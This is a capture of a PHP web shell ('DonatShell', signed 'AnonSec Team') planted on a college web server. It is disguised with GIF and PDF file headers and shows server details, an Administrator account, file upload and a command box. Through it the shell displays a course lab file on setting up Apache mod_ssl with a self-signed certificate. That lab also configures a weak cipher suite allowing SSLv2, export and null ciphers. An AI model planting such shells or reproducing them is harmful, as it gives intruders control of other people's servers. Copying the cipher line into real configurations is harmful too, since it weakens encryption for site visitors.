GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/CST1611/Labs/Lab05/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/CST1611/Labs/Lab05/Lab05.phpinc
<?
// JimMartinson/CST1611/Lab05.phpinc

require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.

$disabled = '';
#$disabled = ' disabled'; // Comment this line to enable lab.

if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? }

$ShowSpanCountBefore = false;
//$ShowSpanCountBefore = true;
// <span class="count">
$directoryFile = '!This is the '.$evaluationName.' directory for '.$userFullName;
?>
<style type="text/css">
b { white-space:nowrap; }
ol { }
li { }
ol.count { counter-reset:item; }
ol.count ol { counter-reset:item; }
ol.count li.count { list-style-type:none; }
ol.count li.count:before { content:counters(item, ".") ". "; counter-increment:item; margin-left:-2em; }
<? if ( !$ShowSpanCountBefore ) { ?>//<? } ?> span.count:before { content:counters(item, "-"); color:#FF0000; }
</style>

<a id="Lab"></a>
<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> assignment</legend>
The purpose of this lab is to demonstrate the ability to use directives from the <tt>mod_ssl</tt> module and setup ssl for https requests.
<br><?=$gradeNote?>
<ol id="main" class="count">
	<? // 1. ?>
	<li>Setup a directory for use in <?=$evaluationType?> <?=$evaluationNumber?>.
		<ol>
			<li>Create a directory called <b class="copyText"><?=$evaluationName?></b> inside your <b><?=$dataFolder?><?=$dirSep?><?=$courseNumber?></b> directory.</li>
			<li>Create a text file called <b class="copyText">!<?=$saveFilename?>.txt</b> in the <b><?=$dataFolder?><?=$dirSep?><?=$courseNumber?><?=$dirSep?><?=$evaluationName?></b> directory.</li>
		</ol>
	</li>
	<? // 2. ?>
	<li>Follow the <a href="../LabHostSetup/?evaluationName=<?=$evaluationName?>&ht=<?=$evaluationName?>.test&ha=127.0.0.<?=$evaluationNumber?>&vh=<?=$evaluationName?>.test&dr=<?=$evaluationName?>&au=true">instructions here</a> to setup a 127.0.0.<?=$evaluationNumber?> host entry and Name-based Virtual Host for <?=$evaluationType?> <?=$evaluationNumber?>.</li>
	<? // 3. ?>
	<li>Create the RSA private key (.key), and the self-signed certificate (.crt). These are used by Apache for TLS (https) connections.
		<ol>
			<li>Check your <b><?=$_SESSION['userDefaultDrive']?>\Apache24\conf</b> directory and ensure the openssl.cnf file is there.
				<br>The <b><?=$_SESSION['userDefaultDrive']?>\Apache24\bin\openssl.exe</b> file is used to create these files. It needs a configuration file (openssl.cnf) file in order to run.
				<ol>
					<li>Open up a command line window.</li>
					<li>If you are not on the <b><?=$_SESSION['userDefaultDrive']?>:</b> drive change to that drive with:<kbd class="copyText"><?=$_SESSION['userDefaultDrive']?>:</kbd> <img src="/images/enter_37.png" align="Enter">.</li>
					<li>Change to the \Apache24\conf directory with <kbd class="copyText">cd \Apache24\conf</kbd> <img src="/images/enter_37.png" align="Enter">.</li>
					<li>Check for the presence of the openssl.cnf file with: <kbd class="copyText">dir open*</kbd> <img src="/images/enter_37.png" align="Enter">.</li>
					<li>If the file is not there; Download the <a href="openssl.cnf">openssl.cnf</a> file and save it in your <b><?=$_SESSION['userDefaultDrive']?>:\Apache24\conf</b> directory</li>
				</ol>
			</li>
			<li>Create the RSA private key (.key), and the self-signed certificate (.crt).
				<ol>
					<li>Open a command line window and change drive\directory to <b class="copyText"><?=$_SESSION['userDefaultDrive']?>:\Apache24\conf</b>.</li>
					<li>
						<span class="note">I had an error in the command. I had <b>-X509</b>, it should have been <b>-x509</b> ( lower caxe x).</span><!-- set OPENSSL_CONF=C:\Apache24\conf\openssl.cnf -->
						<br>Enter the command: <kbd class="nowrap copyText">..\bin\openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout <?=$evaluationName?>.test.key -out <?=$evaluationName?>.test.crt</kbd> and answer the following questions:
						<br><kbd>Country Name (2 letter code) [AU]:</kbd><entry class="copyText">US</entry>
						<br><kbd>State or Province Name (full name) [Some-State]:</kbd><entry class="copyText">Minnesota</entry>
						<br><kbd>Locality Name (eg, city) []:</kbd><entry class="copyText">Hutchinson</entry>
						<br><kbd>Organization Name (eg, company) [Internet Widgits Pty Ltd]:</kbd><entry class="copyText"><?=$_SESSION['userFullName']?>, Inc.</entry> 
						[Usually the company name]
						<br><kbd>Organizational Unit Name (eg, section) []:</kbd> [You can leave this blank. It is used for sub-organization identification]
						<br><kbd>Common Name (eg, YOUR name) []:</kbd><entry class="copyText"><?=$evaluationName?>.test</entry> [This is actually the server name (DNS host name)]
						<br><kbd>Email Address []:</kbd><entry class="copyText"><?=$_SESSION['userEmail']?></entry> [Enter your email address]
						<!-- <br>You should now see the <b><?=$evaluationName?>.test.csr</b> and <b>privkey.pem</b> files in your <b><?=$_SESSION['userDefaultDrive']?>:\Apache24\conf</b> directory.-->
					</li>
				</ol>
			</li>
			<li>Copy the <b><?=$evaluationName?>.test.crt</b>, and <b><?=$evaluationName?>.test.key</b> files into your <b><?=$dataFolder?><?=$dirSep?><?=$courseNumber?><?=$dirSep?><?=$evaluationName?></b> directory.</li>
		</ol>
	</li>
	<? // 4. ?>
	<li>
		Disable the default ssl setting that Apache Haus has configured.
		<ol>
			<li>Find the httpd.conf line <samp><tt>LoadModule</tt> ssl_module modules/mod_ssl.so</samp> and comment it out so it becomes:
				<br><comm>#LoadModule ssl_module modules/mod_ssl.so</comm>
				<span class="note">(I found this on line 171)</span>
				<br>This will disable the default Apache Haus ssl configuration.
			</li>
			<li>Find the <code>&lt;IfModule ssl_module&gt;</code> section and comment out the contents: <span class="note">(I found this on line 520)</span>
				<br><samp>Include cont/extra/httpd-ahssl.conf</samp> becomes <comm>#Include cont/extra/httpd-ahssl.conf</comm>.
				<br><samp>SSLRandomSeed startup builtin</samp> becomes <comm>#SSLRandomSeed startup builtin</comm>.
				<br><samp>SSLRandomSeed connect builtin</samp> becomes <comm>#SSLRandomSeed connect builtin</comm>.
			</li>
			<li>Save your changes.</li>
		</ol>
	</li>
	<? // 5. ?>
	<li>Setup Apache for ssl.
		<ol>
			<li>Configure Apache for mod_ssl.
				<br>Edit your Apache httpd.conf file and enter the following lines just before your <?=$evaluationName?>.test <code>VirtualHost</code> directive:
				<pre class="samp copyText">
<tt>LoadModule</tt> ssl_module modules/mod_ssl.so
<code>&lt;IfModule ssl_module&gt;</code>
	<tt>Listen</tt> 443
	<tt>AddType</tt> application/x-x509-ca-cert .crt
	<tt>AddType</tt> application/x-pkcs7-crl .crl
	SSLPassPhraseDialog builtin
	SSLSessionCache "shmcb:<?=$_SESSION['userDefaultDrive']?>/Apache24/logs/ssl_scache(512000)"
	SSLSessionCacheTimeout 300
	SSLRandomSeed startup builtin
	SSLRandomSeed connect builtin
	<code>&lt;FilesMatch "\.(cgi|shtml|phtml|php)$"&gt;</code>
		SSLOptions +StdEnvVars
	<code>&lt;/FilesMatch&gt;</code>
<code>&lt;/IfModule&gt;</code></pre>
			</li>
			<li>Modify the <?=$evaluationName?>.test <code>VirtualHost</code> for ssl.
				<ol>
					<li>Modify the <?=$evaluationName?>.test <code>VirtualHost</code> line to add the IP address and ssl port number: <code>&lt;VirtualHost 127.0.0.<?=$evaluationNumber?>:443&gt;</code>.</li>
					<li>Insert the following lines before the <code>Directory</code> Directive:
						<pre class="samp copyText">
		SSLEngine on
		SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
		SSLCertificateFile "<?=$apacheFolder?>/<?=$courseNumber?>/<?=$evaluationName?>/<?=$evaluationName?>.test.crt"
		SSLCertificateKeyFile "<?=$apacheFolder?>/<?=$courseNumber?>/<?=$evaluationName?>/<?=$evaluationName?>.test.key"
</pre>
					</li>
				</ol>
			</li>
			<li>Save your changes.</li>
		</ol>
	</li>
	<? // 6. ?>
	<li>Download <b><a href="<?=$evaluationName?>-https.php"><?=$userFullName?>-https.html</a></b> and save it in your <b><?=$dataFolder?><?=$dirSep?><?=$courseNumber?><?=$dirSep?><?=$evaluationName?></b> directory.</li>
	<? // 7. ?>
	<li>Verify that your SSL configuration works.
		<ol>
			<li>Stop and restart Apache.</li>
			<li>Open up a browser.</li>
			<li>Enter <b>https://<?=$evaluationName?>.test</b> in the address bar.</li>
			<li>Hit enter.</li>
			<li>Follow the steps to OK the certificate or continue.</li>
			<li>Click on the <?=$userFullName?>-https.html file.</li>
			<li>Take a screenshot of the page. <b class="attention">Important! See screenshot requirements below:</b>
				<ol>
					<li>Make sure that the address bar is visible in your screenshot before saving the image.</li>
					<li>
						Ensure that your browser shows that the site is insecure and that it is the certificate that is invalid.
						<br>This is shown in the lcoation bar with something like:
						<ul>
							<li>Chrome:<img src="images/Chrome_insecure.png" alt="Chrome insecure"></li>
							<li>Edge:<img src="images/Edge_insecure.png" alt="Edge insecure"></li>
							<li>Firefox:<img src="images/Firefox_insecure.png" alt="Firefox insecure"></li>
						</ul>
						If it only shows <b>Not secure</b> in black: <img src="images/Insecure.png" alt="Insecure in black"> that is not good enough.
						The use of http also shows <b>Not secure</b> in this fashion.
						The problem could also be caused by a browser theme you are using.
						<br>
						You will need to do one of the following:
						<ul>
							<li>Use a different browser that does show <b class="error">Not secure</b> in red.</li>
							<li>Update your browser. <span class="note">Up to date browsers like: Chrome, Edge, and Firefox should do so.</span></li>
							<li>Open up the certification, take a screenshot of that, save the screenshot as <b class="copyText"><?=$saveFilename?>_cert.png</b>, and include it with your submission.</li>
						</ul>
					</li>
					<li>
						Take a screenshot of the page and save it as <b class="copyText"><?=$saveFilename?>.png</b> in your <b><?=$dataFolder?><?=$dirSep?><?=$courseNumber?><?=$dirSep?><?=$evaluationName?></b> directory.
					</li>
				</ol>
			</li>
		</ol> 
	</li>
	<? // 8. ?>
	<li>Turn in your assignment:
		<ol type="a">
			<li>Copy your <b>hosts</b> and <b>httpd.conf</b> file into your <b><?=$evaluationName?></b> folder.</li>
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b class="copyText"><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.
		</ol>
	</li>
 </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
<!-- <? if ( isset($assignmentWeekDue) ) { ?><?=$evaluationType?> <?=$evaluationNumber?> is due on or before <?=classWeekDateCSS($class['startDate'][0],$assignmentWeekDue)?>.<? } ?> -->
<?=$gradeNote?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
require('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team